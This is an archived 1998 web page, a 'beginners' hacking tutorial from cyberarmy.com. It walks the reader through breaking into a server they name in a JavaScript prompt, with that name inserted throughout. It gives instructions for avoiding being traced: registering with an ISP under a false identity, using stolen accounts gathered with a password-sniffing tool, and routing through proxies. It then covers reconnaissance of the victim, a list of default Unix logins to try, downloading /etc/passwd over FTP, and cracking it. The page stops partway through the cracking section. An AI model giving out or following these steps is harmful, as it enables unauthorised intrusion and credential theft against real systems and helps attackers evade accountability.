
<body bgcolor="#000000" link="#00FF00" vlink="#008080" alink="#008080" text="#00FF00">
<title>Beginners Security Guide</title>
<p align="center">&nbsp;</p>

<p align="center"><strong><font color="#00FF00" size="3" face="Arial">BEGINNERS &quot;STEP
BY STEP&quot; SECURITY GUIDE, v0.1.32</font></strong></p>

<blockquote>
  <p>&nbsp;</p>
  <p><font face="Arial">By Overlord, � June, 1998. The latest version of this guide is
  always avaliable from <a href="http://www.cyberarmy.com">www.cyberarmy.com</a>. You are
  free to distribute this page on your site, all I ask is that you leave this notice here
  and place a link to www.cyberarmy.com on your site.</font></p>
  <p><font face="Arial" size="3">This guide is Beta, and starts at the absolute basics -
  step by step. If you like it, I'll try to keep adding sections. If you know your stuff,
  send me sections you've written yourself and I'll add them in. If you want to put this
  guide on your site, <a href="hacktute.zip">here are all the zipped files</a> you will
  need.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#INTRODUCTION:">I Want to Start at
  the Start</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE ANATOMY OF THE 'HACK'">I Want
  to Go Straight to Hacking</a>]</font></p>
  <hr>
  <script LANGUAGE="JavaScript">
<!---------- JavaScript begins...

var Name = prompt ("Please enter the name of the server you want hacked. Do not include the 'www' part, or any subdirectories. Example type 'acme.net'","");

if ((Name == "") || (Name == null)) {	Name = "acme.net";	}


// JavaScript ends ----------></script>
<p>&nbsp;</p>
  <p><a name="INTRODUCTION:"><font color="#00FF00" size="3" face="Arial">INTRODUCTION:</font></a></p>
  <p><font color="#00FF00" size="3" face="Arial"><br>
  A little background is needed before we get into hacking techniques.<br>
  <br>
  When we talk about &#145;Hacking&#146;, we are talking about getting some access on a
  server we shouldn&#146;t have. Servers are set up so that many people can use them. These
  people each have different &#145;accounts&#146; on the server &#150; like different
  directories that belong just to them. If Fred has an account with the <script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> ISP (Internet Service Provider), he will be given:</font></p>
  <p><font color="#00FF00" size="3" face="Arial">(1) a login name, which is like the name of
  your directory; and<br>
  (2) a password, which lets you get access to that directory.</font></p>
  <p><font color="#00FF00" size="3" face="Arial">This login name and password will usually
  give you access to all of Fred&#146;s services - his mail, news services and web pages.
  There is also the &#145;root&#146; account, which has it&#146;s own login and password.
  This gives super-user access to the entire server. We will focus on &#145;getting
  root&#146;, in this help file.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3">&nbsp;<img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE ANATOMY OF THE 'HACK'">Ok, I
  want to move to the 'anatomy of the hack</a>']</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#'DON'T GET CAUGHT':">I know all
  this, let me move straight to hacking</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a
  href="http://www.cyberarmy.com/tute/htext1.shtml">I don't have a clue what you're on about, let
  me read some background<br>
  on this so called &quot;Internet&quot; you keep referring to</a>]</font></p>
  <hr>
  <p align="left">&nbsp;</p>
  <p align="left"><font face="Arial" size="3"><a name="THE ANATOMY OF THE 'HACK'">THE
  ANATOMY OF THE 'HACK'</a>:<br>
  </font></p>
  <p><font color="#00FF00" size="3" face="Arial">There are two main ways to break into a
  system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You
  can try to get in by finding the combination of the vault. This is like finding the
  password. It&#146;s how you are meant to get in. The second way is by using dynamite. You
  forget all about the &#145;proper&#146; way to get in. This is like using
  &#145;exploits&#146;, or weaknesses in the servers operating system to gain access.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#'DON'T GET CAUGHT':">Ok, Let's
  Go. Tell Me About Not Getting Caught</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#INFO GATHERING:">Stuff it, I know
  how to not get caught, on to the techniques!</a>]</font></p>
  <hr>
  <p align="center">&nbsp;</p>
  <p><font color="#00FF00" size="3" face="Arial"><a name="'DON'T GET CAUGHT':">'DON'T GET
  CAUGHT':</a></font></p>
  <p><font face="Arial" size="3"><br>
  Hacking is illegal, and it is very easy to trace you if <script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script>
  realizes you hacked them. Wherever you go, <br>
  your IP number (your computer&#146;s unique identification) is left and often logged.
  Solutions:<br>
  <br>
  1. When you set up your account with an ISP, give a false name and address.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#'DON'T GET CAUGHT':2">Nah, I
  can't be bothered, what other things can I do?</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#'DON'T GET CAUGHT':3">Ok, I used
  this trick. What else can I do?</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#INFO GATHERING:">Stuff it, I know
  how to not get caught, on to the techniques!</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font color="#00FF00" size="3" face="Arial"><a name="'DON'T GET CAUGHT':2">'DON'T GET
  CAUGHT':</a></font></p>
  <p><font face="Arial" size="3">2. Hack using a filched account (stolen password, etc.). A
  tool called <a href="http://www.cyberarmy.com/files/dripper.zip">Dripper</a> can steal
  passwords for you from public net cafes and libraries.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#'DON'T GET CAUGHT':3">Nah, just
  tell me something easy I can do right now</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#'DON'T GET CAUGHT':3">Ok, done.
  Anything else I should do?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="'DON'T GET CAUGHT':3">'DON'T GET CAUGHT':</a></font></p>
  <p><font face="Arial" size="3">3. Port your connection through something else.</font></p>
  <p><font face="Arial" size="3">An easy way to do this is to change your proxy settings. By
  using the proxy settings meant for a different ISP, it can look like you are surfing from
  wherever that ISP is. A list of proxies you can use is <a href="proxies.htm">here</a>.</font></p>
  <p><font face="Arial" size="3">You should also do any important info gathering through the
  IP Jamming Applet on the <a href="http://www.cyberarmy.com">Cyberarmy.Com</a> to hide your
  IP.</font></p>
  <p><font face="Arial" size="3">If you want super anonymity, you should be surfing in an
  account you set up under a false name, with your proxy settings changed, and also surfing
  through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the
  number of someone logging on. Dial the relevant code to disable Caller ID before calling
  your ISP.</font></p>
  <p align="center"><font face="Arial" size="3"><br>
  <img src="choices.GIF" width="120" height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a
  href="http://www.cyberarmy.com/tute/htext3.shtml">I don't understand about the proxy settings
  thing, let me read more</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#INFO GATHERING:">Ok, I am wired
  for hyper stealth... Now, I want to HACK!</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="INFO GATHERING:">INFO GATHERING:</a><br>
  <br>
  To start off, you will probably need to gather information about www.</font><font
  color="#00FF00" size="3" face="Arial"><script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font
  face="Arial" size="3"> using internet tools.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#DIRT DIGGING STAGE:">Ok, how?</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a
  href="http://www.cyberarmy.com/tute/htext2.shtml">Give me some reading to do about info
  gathering</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#HACKING THROUGH THE PASSWORD:">No,
  I've already got all the info, just tell me what to do</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="DIRT DIGGING STAGE:">DIRT DIGGING STAGE:</a></font></p>
  <p><font face="Arial" size="3">We are now taking the first steps of any hack... Info
  Gathering.</font></p>
  <p><font face="Arial" size="3">You should be set up for stealth mode. Get a notepad, and
  open a new browser window (through the IP Jammer). Bring the </font><font color="#00FF00"
  size="3" face="Arial">www.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font face="Arial"
  size="3">'s web page up in the IP Jammer's window. You can load the IP Jamming applet on
  the <a href="http://www.cyberarmy.com">Cyberarmy.Com</a>.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#CASE THE JOINT:">Ok, What Now?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="CASE THE JOINT:">CASE THE JOINT:</a></font></p>
  <p><font face="Arial" size="3">1. First, check out the site. Take down any email
  addresses, copy down the HTML of important pages.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE OLD BOUNCING MAIL TRICK:">Done...
  What Else?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="THE OLD BOUNCING MAIL TRICK:">THE OLD BOUNCING
  MAIL TRICK:</a></font></p>
  <p><font face="Arial" size="3">2. Send a mail that will bounce to the site. If the site is
  www.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> , send a mail to blahblahblah@<script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> . It will bounce back to you and give you information in
  its header.</font></p>
  <p><font face="Arial" size="3">Copy the information from the headers down.</font></p>
  <p><font face="Arial" size="3">(To maintain anonymity, it might be a good idea to send and
  receive the mail from a free web based provider, such as hotmail.com. Use full stealth
  features when sending the bouncing mail. This will protect you when they check through the
  logs after they are hacked.)</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#TRACEROUTE:">Done... What Else?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="TRACEROUTE:">TRACEROUTE:</a></font></p>
  <p><font face="Arial" size="3">3. Still using stealth features, Traceroute </font><font
  color="#00FF00" size="3" face="Arial"><script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font
  face="Arial" size="3">. This Traceroute search is avaliable from the Hacker's Home Page,
  in the Net Tools section.</font></p>
  <p><font face="Arial" size="3">This will tell you the upstream provider of the victim
  server.</font></p>
  <p>&nbsp;</p>
  <form method="POST" action="http://www.freetown.com/ftbin/netquery.cgi">
    <div align="center"><center><table width="307">
      <tr align="center">
        <td width="201"><div align="left"><p><font face="Arial" color="#00FF00"><small><small>TOOLS</small></small></font><font
        face="Arial" color="#008080"><br>
        <font size="1"><select name="Method" size="1">
          <option value="nslookup">NSLookup </option>
          <option value="whois">Whois </option>
          <option selected value="traceroute">Traceroute</option>
        </select></font></font></td>
        <td width="203"><font color="#008080"><font face="Arial"><small><small>&nbsp;</small></small></font><font
        face="Arial" size="2"><br>
        </font></font><font face="Arial" color="#008080" size="2"><input name="Value" size="27"
        value="127.0.0.1"></font></td>
        <td width="113"><input type="submit" value="Submit" name="B1"></td>
      </tr>
    </table>
    </center></div>
  </form>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#WHOIS:">Ok, what next?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="WHOIS:">WHOIS:</a></font></p>
  <p><font face="Arial" size="3">3. Still using stealth features, Whois the site. This Whois
  search is avaliable from the Hacker's Home Page, in the Net Tools section.</font></p>
  <p><font face="Arial" size="3">This will give you information on the owners and servers
  that run the site. Write it down.</font></p>
  <p>&nbsp;</p>
  <form method="POST" action="http://www.freetown.com/ftbin/netquery.cgi">
    <div align="center"><center><table width="307">
      <tr align="center">
        <td width="201"><div align="left"><p><font face="Arial" color="#00FF00"><small><small>TOOLS</small></small></font><font
        face="Arial" color="#008080"><br>
        <font size="1"><select name="Method" size="1">
          <option value="nslookup">NSLookup </option>
          <option selected value="whois">Whois</option>
          <option value="traceroute">Traceroute </option>
        </select></font></font></td>
        <td width="203"><font color="#008080"><font face="Arial"><small><small>&nbsp;</small></small></font><font
        face="Arial" size="2"><br>
        </font></font><font face="Arial" color="#008080" size="2"><input name="Value" size="27"
        value="127.0.0.1"></font></td>
        <td width="113"><input type="submit" value="Submit" name="B1"></td>
      </tr>
    </table>
    </center></div>
  </form>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#GIVE 'EM THE FINGER:">Ok, what
  next?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="GIVE 'EM THE FINGER:">GIVE 'EM THE FINGER:</a></font></p>
  <p><font face="Arial" size="3">4.&nbsp; Finger the site. Use this finger service at
  Cyberarmy.Com to check the site. Try fingering just with &#147;finger @<script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> &#148; first. This sometimes tells you the names of all
  accounts. If this does not work, try fingering any email addresses you found on the site,
  and through Whois. This will sometimes give you useful information.</font></p>
  <p>&nbsp;</p>
  <form method="post" action="http://rickman.com/cgibin/finger.cgi">
    <div align="center"><center><table border="0">
      <tr>
        <td align="center"><div align="left"><p><font face="Arial" color="#00FF00"><span
        style="font-family: Arial"><small><small>FINGER</small></small></span></font><font
        color="#008080"><br>
        <font face="Arial"><small><input name="user" value="username" size="18"></small></font> <small>@
        </small></font></td>
        <td align="center"><font color="#008080"><small>&nbsp;</small><br>
        <font face="Arial"><small><input name="host" value="hostname" size="18"></small></font></font></td>
        <td align="center"><input type="submit" value="Submit" name="B1"></td>
      </tr>
    </table>
    </center></div>
  </form>
  <p align="center">&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE DEADLY PORT SCAN:">Ok, what
  next?</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="THE DEADLY PORT SCAN:">THE DEADLY PORT SCAN:</a></font></p>
  <p><font face="Arial" size="3">5. Now, we're about to get rough on the site. Port Scan the
  site.</font></p>
  <p><font face="Arial" size="3">Port scanning checks for all open ports for an IP. It is
  extremely useful, however, it practially screams to the webmaster's of the victim site
  that they are in the middle of being hacked. The is basically no legitimate reason to port
  scan a site unless you are about to hack it.</font></p>
  <p><font face="Arial" size="3">There are no very good ways to hide a port scan, but there
  are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However,
  the Exploit Generator for Windows is one that claims to be stealthy. However, if you are
  trying to enter a very secure site, perhaps forget about port scanning for now, unless you
  are running Linux.</font></p>
  <p><font face="Arial" size="3">Though, port scan will tell you all the services a site is
  running. If port 21 is open, it means they have an FTP server. If port 23 is open, it
  means they have telnet.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#TELNETTING:">Ok, What next?</a>]</font></p>
  <hr>
  <p align="left">&nbsp;</p>
  <p align="left"><font face="Arial" size="3"><a name="TELNETTING:">TELNETTING:</a></font></p>
  <p align="left"><font face="Arial" size="3">5. The aim of telnetting to the site is
  basically to try and find out the server type. While your browser is in stealth mode, use
  the Anonymous Telnet applet in the <a href="http://www.cyberarmy.com">Cyberarmy.Com</a> to
  open a Telnet window.</font></p>
  <p align="left"><font face="Arial" size="3">Telnet to the site to Port 23. Usually, if the
  address is &#147;www.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> &#148;, try telnetting to
  &quot;<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> &quot;. If this does not work, try to telnet
  to telnet.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> or try telnetting to any of the sites
  listed as name servers in your previous Whois search. Once you have got access, note any
  information it gives you, such as server type.</font></p>
  <p align="left">&nbsp;</p>
  <p align="left">&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#HACKING THROUGH THE PASSWORD:">This
  worked - I got the server type!</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#TELNETTING:2">None of that
  worked...</a>]</font></p>
  <p align="left">&nbsp;</p>
  <hr>
  <p align="left">&nbsp;</p>
  <p align="left"><font face="Arial" size="3"><a name="TELNETTING:2">TELNETTING:</a></font></p>
  <p><font face="Arial" size="3">Now change the telnet to port 21. This should send you
  straight in to the server's FTP port. If this works, try typing SYST to find out what
  server type it is.</font></p>
  <p>&nbsp;</p>
  <p>&nbsp;</p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#HACKING THROUGH THE PASSWORD:">This
  worked - I got the server type!</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#TELNETTING:3">None of that
  worked...</a>]</font></p>
  <hr>
  <p align="center">&nbsp;</p>
  <p align="left"><font face="Arial" size="3"><a name="TELNETTING:3">TELNETTING:</a></font></p>
  <p><font face="Arial" size="3">Now, if you are lucky, try telnetting to port 80, the HTTP
  port. Note if this gives you any information.</font></p>
  <p align="center">&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#HACKING THROUGH THE PASSWORD:">This
  worked - I got the server type!</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#RUNNING LAME PROGRAMS:">None of
  that worked...</a>]</font></p>
  <hr>
  <p align="center">&nbsp;</p>
  <p align="left"><font face="Arial" size="3"><a name="RUNNING LAME PROGRAMS:">RUNNING LAME
  PROGRAMS:</a></font></p>
  <p align="left"><font face="Arial" size="3">You *need* to know the server type to have any
  hope of hacking the thing. How do you expect to run exploits against it if you cant even
  figure out what you're dealing with here?</font></p>
  <p align="left"><font face="Arial" size="3">A final resort is to run a program called
  Whats Running? It doesn't work very well, but will sometimes tell you the server type. It
  will also probably be logged by the victim server.</font></p>
  <p align="left"><font face="Arial" size="3">If that doesn't work, do anything to find the
  server type. Even write them an e-mail asking&nbsp; what operating system&nbsp; they're
  running.</font></p>
  <p align="left">&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#HACKING THROUGH THE PASSWORD:">Ok,
  I've got the Info... Now I want access!</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="HACKING THROUGH THE PASSWORD:">HACKING THROUGH THE
  PASSWORD:</a></font></p>
  <p><font face="Arial" size="3">We will now try to go through the front door of the server.
  As to our analogy, we are trying to find the combination of the safe.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#EASY THINGS FIRST:">Ok, I Want
  Root!</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE OLD-STYLE PHF TECHNIQUE:">Nah,
  I already know this server will need exploits</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="EASY THINGS FIRST:">EASY THINGS FIRST:</a><br>
  <br>
  You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP
  spoofing and social <br>
  engineering, just to find that we could have got in by using:<br>
  <br>
  $Login: root<br>
  $Password: root<br>
  <br>
  So, let&#146;s just try this first and get it out of the way. Unix comes set up with some
  default passwords, and <br>
  sometimes these are not changed. So, we telnet to <script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script>
  .<br>
  <br>
  Don&#146;t use your usual telnet program. Unless you are using a filched or anonymous
  account, it will show <br>
  your IP address to <script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> . With your proxies changed,
  and everything set for stealth, switch back to the Anonymous Telnet window.<br>
  <br>
  Then try the following accounts and passwords:<br>
  <br>
  ACCOUNT: PASSWORD<br>
  (login) root: (password)root<br>
  sys: sys / system / bin<br>
  bin: sys / bin<br>
  mountfsys: mountfsys<br>
  adm: adm<br>
  uucp: uucp<br>
  nuucp: anon<br>
  anon: anon<br>
  user: user<br>
  games: games<br>
  install: install<br>
  demo: demo<br>
  umountfsys: umountfsys<br>
  sync: sync<br>
  admin: admin<br>
  guest: guest<br>
  daemon: daemon<br>
  <br>
  The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level
  accounts, meaning they have sysop power, or total power. Other logins are just &quot;user
  level&quot; logins meaning they only have power <br>
  over what files/processes they own.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#USING THE LOGIN NAMES:">Nup...
  Didn't think it would work</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#CONGRATULATIONS:">Incredible...
  That Lame Trick Actually Worked!</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="USING THE LOGIN NAMES:">USING THE LOGIN NAMES:</a></font></p>
  <p><font face="Arial" size="3">Still simple things first. About 1 in 20 people are stupid
  enough to have the same login name and password. With your list of all the email addresses
  or finger information you dug from the site, try this.</font></p>
  <p><font face="Arial" size="3">For example, if the web site made a reference to fred@<script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> , try logging in (through telnet or a FTP <br>
  program to their server) as:<br>
  <br>
  $Login: Fred<br>
  $Password: Fred<br>
  <br>
  Do this with all the names you have found - you might get lucky.<br>
  <br>
  Did this work?</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#GETTING THE PASSWD FILE:">Nah,
  they had some baddass security, didn't work</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#CONGRATULATIONS:">Oh, Golly
  Gee... I got access to one of the accounts!</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="GETTING THE PASSWD FILE:">GETTING THE PASSWD FILE:</a><br>
  <br>
  You probably had no luck until now. Actually, most hacking techniques only have a slim
  chance of success. You just try hundreds of slim chances till you get it.</font></p>
  <p><font face="Arial" size="3">Assuming you were trying to log in on a Unix system, you
  may have been wondering how Unix checks to see whether the passwords you gave were correct
  or not. There is a file called &#145;passwd&#146; on each Unix system which has all the
  passwords for each user. So, if we can&#146;t guess the passwords, we will now try to rip
  this file and decrypt it.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#ANCIENT CHINESE FTP METHOD:">Make
  it so, Number 1</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="ANCIENT CHINESE FTP METHOD:">ANCIENT CHINESE FTP
  METHOD:</a></font></p>
  <p><font face="Arial" size="3">Your browser should be set to use the fake proxies. We will
  keep using this browser to FTP, because it cannot be easily traced, whereas something like
  CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found
  an opne port 21, its a pretty good indication that they run an FTP server.</font></p>
  <p><font face="Arial" size="3">Using your stealth browser, try to FTP to <script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> . Example: ftp://<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> <br>
  <br>
  If that does not work, try to FTP to ftp.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> .
  Example: ftp://ftp.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> <br>
  <br>
  If that does not work, try to FTP to the Domain Name Servers listed when you did your
  WHOIS search. Example: ftp://ns1.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script> </font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#ANCIENT CHINESE FTP METHOD:2">Ok,
  I'm In</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE OLD-STYLE PHF TECHNIQUE:">Nah,
  stupid thing won't let me in</a>]</font></p>
  <hr>
  <p align="center">&nbsp;</p>
  <p><font face="Arial" size="3"><a name="ANCIENT CHINESE FTP METHOD:2">ANCIENT CHINESE FTP
  METHOD:</a></font></p>
  <p><font face="Arial" size="3">Now you are connected to <script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script>
  &#146;s FTP server, click on their \etc directory.</font></p>
  <p><font face="Arial" size="3">You should see a file called &#145;passwd&#146; and maybe a
  file called &#145;group&#146;. Download the &#145;passwd&#146; file, and <br>
  look at it.</font></p>
  <p><font face="Arial" size="3">If it looks like this when you open it, you are in luck:<br>
  <br>
  root:2fkbNba29uWys:0:1:Operator:/:/bin/csh<br>
  admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh<br>
  kangaroo:3A62i9qr:1012:10:Hisaharu<br>
  [etc.]<br>
  <br>
  For example, we know a login is &#147;kangaroo&#148; and their encrypted password is
  &#147;3A62i9qr&#148;. Note - this is not their password, but an encrypted form of their
  password.<br>
  <br>
  Or, did it look more like this:<br>
  <br>
  root:*:0:1:Operator:/:/bin/csh<br>
  admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh<br>
  kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh<br>
  <br>
  Is the second, encrypted password, section replaced by *&#146;s or x&#146;s? This is bad
  &#150; it is called a shadowed <br>
  password and cannot be decrypted. This is how most passwd files are now days. However, if
  you got a <br>
  passwd file which has some non-shadowed entries, you can put your hand to decrypting it.<br>
  </font></p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE OLD-STYLE PHF TECHNIQUE:">Nah,
  It was all shadowed</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE OLD-STYLE PHF TECHNIQUE:">Nah,
  couldn't find the passwd file in the first place</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#DECRYPTING PASSWD FILES:">Yes! I
  think I got some non-shadowed passwords</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="DECRYPTING PASSWD FILES:">DECRYPTING PASSWD FILES:</a><br>
  <br>
  There are a few programs around which were written to decrypt Unix passwd files. The most
  famous one was called &#145;Cracker Jack&#146;. Many &#145;hacking&#146; texts strongly
  recommend this file &#150; but they are mostly talking rubbish. Its old and most systems
  will just crash when they try to run it, as it uses weird memory allocation.</font></p>
  <p><font face="Arial" size="3">The best Unix cracker around is currently called 'John the
  Ripper 1.5&#146;. It is readily avaliable. It was only written in the last year or so, and
  is a lot faster than Cracker Jack ever was. John the Ripper was also designed with
  Pentiums in mind, and the brute force techique used is genius. But you have to go down to
  DOS to use it.</font></p>
  <p><font face="Arial" size="3">You will also need a large &#145;wordfile&#146;, with every
  English word. Bigger the better. The Crack Programs test every word in the wordfile
  against the passwd file. If the wordfile is big enough, you have a good chance of getting
  a password.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
